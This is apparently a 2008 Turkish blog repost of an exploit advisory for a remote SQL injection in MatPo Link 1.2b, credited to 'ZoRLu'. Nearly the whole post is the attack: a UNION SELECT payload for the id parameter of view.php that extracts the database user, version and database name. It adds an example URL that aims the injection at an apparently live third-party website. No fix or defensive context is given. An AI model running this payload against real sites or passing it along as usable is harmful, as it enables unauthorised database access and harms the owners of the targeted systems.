"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

3 Kasım 2008 Pazartesi

MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability

MatPo Link 1.2b (view.php id) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6967

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/view.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

example:

http://hilfe-forum.pytalhost.de/linkliste/view.php?id=-999999999+union+select+1,2,concat(user(),0x3a,version()),database(),5,6,7--

0 yorum:

 
Dizi